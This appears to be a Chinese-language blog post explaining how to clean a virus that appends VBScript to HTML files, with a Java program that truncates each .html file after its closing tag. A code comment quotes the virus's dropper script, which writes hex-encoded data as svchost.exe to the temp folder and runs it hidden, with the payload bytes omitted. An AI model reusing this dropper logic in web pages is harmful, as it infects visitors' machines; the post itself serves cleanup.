html病毒DropFileName = "svchost.exe" WriteData = "4D5A900...DropPath的解决方法

html病毒<SCRIPTLanguage=VBScript><!–DropFileName = "svchost.exe"WriteData = "4D5A900…WSHshell.Run DropPath, 0//–></SCRIPT>的解决方法

最佳方法是下载杀毒软件查杀病毒，此方法只是替换感染后的文件，病毒还是存在的，所以仍会感染⊙﹏⊙‖∣°

Java源代码：

在这里插入代码片package KillEndCodes;

import java.io.*;
import java.util.Scanner;

/**
 * @Description: 该html病毒特征：打开html文件后，该病毒会在html文件末尾添加111KB的VBScript代码，删除后又会自动生成。
 * 病毒代码：<SCRIPT Language=VBScript><!--
 * DropFileName = "svchost.exe"
 * WriteData = "4D5A9...(此处省略若干十六进制数字)
 * 0000000"
 * Set FSO = CreateObject("Scripting.FileSystemObject")
 * DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
 * If FSO.FileExists(DropPath)=False Then
 * Set FileObj = FSO.CreateTextFile(DropPath, True)
 * For i = 1 To Len(WriteData) Step 2
 * FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
 * Next
 * FileObj.Close
 * End If
 * Set WSHshell = CreateObject("WScript.Shell")
 * WSHshell.Run DropPath, 0
 * //--></SCRIPT>
 * 解决方法：生成新的文件替换含有VBScript病毒代码的html文件。
 * @Author: Java_Enthusiast
 * @CreateDate: 2018/10/10 19:39
 * @Version: 1.0
 */

public class KillEndCodes {
    public static void main(String[] args) throws IOException {
        System.out.println("请输入要扫描文件夹的完整路径：");
        Scanner sc = new Scanner(System.in);
        String f = sc.next();
        File file = new File(f);
        System.out.println("杀毒文件夹：" + file.getPath());
        System.out.println("杀毒开始");
        System.out.println("杀毒中，请耐心等待...");
        countTime(file);
    }

    /**
     * 计算杀毒花费的时间
     *
     * @param file
     */
    private static void countTime(File file) {
        long start = System.currentTimeMillis();
        listAllFiles(file);
        long end = System.currentTimeMillis();
        long total_time = end - start;
        System.out.println("杀毒结束");
        long hour = total_time / 1000 / 60 / 60;
        long minute = total_time / 1000 / 60 - hour * 60;
        long second = total_time / 1000 - minute * 60 - hour * 60 * 60;
        long millisecond = total_time - second * 1000 - minute * 60 * 1000 - hour * 60 * 60;
        System.out.println("总耗时：" + hour + "小时" + minute + "分钟" + second + "秒" + millisecond + "毫秒");
    }

    /**
     * 用新文件替换掉结尾含有病毒代码的文件
     *
     * @param file
     */
    private static void replaceEndCodes(File file) {
        try {
            File file1 = new File(file.getParent(), file.getName().substring(0, file.getName().indexOf(".html")) + "1.html");
            FileInputStream fis = new FileInputStream(file);
            FileOutputStream fos = new FileOutputStream(file1);
            byte[] bytes = new byte[8192];
            int len = 0;
            StringBuilder sb = new StringBuilder();
            while ((len = fis.read(bytes)) != -1) {
                String string = new String(bytes, 0, len);
                if (!string.contains("</html>")) {
                    sb.append(string);
                } else {
                    sb.append(string.substring(0, string.indexOf("</html>")));
                    sb.append("</html>");
                    break;
                }
            }
            fos.write(sb.toString().getBytes());
            fos.close();
            fis.close();
            file.delete();
            file1.renameTo(file);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * 递归遍历每个文件夹并且获得文件数组
     *
     * @param file
     */
    private static void listAllFiles(File file) {
        File[] files = file.listFiles(new FileFilter() {
            @Override
            public boolean accept(File pathname) {
                return true;
            }
        });

        for (File f : files) {
            try {
                if (f.isDirectory()) {
                    listAllFiles(f);
                } else if (f.getName().endsWith(".html")) {
                    replaceEndCodes(f);
                } else {
                    continue;
                }
            } catch (Exception e) {
                continue;
            }
        }
    }
}

运行结果：

`

`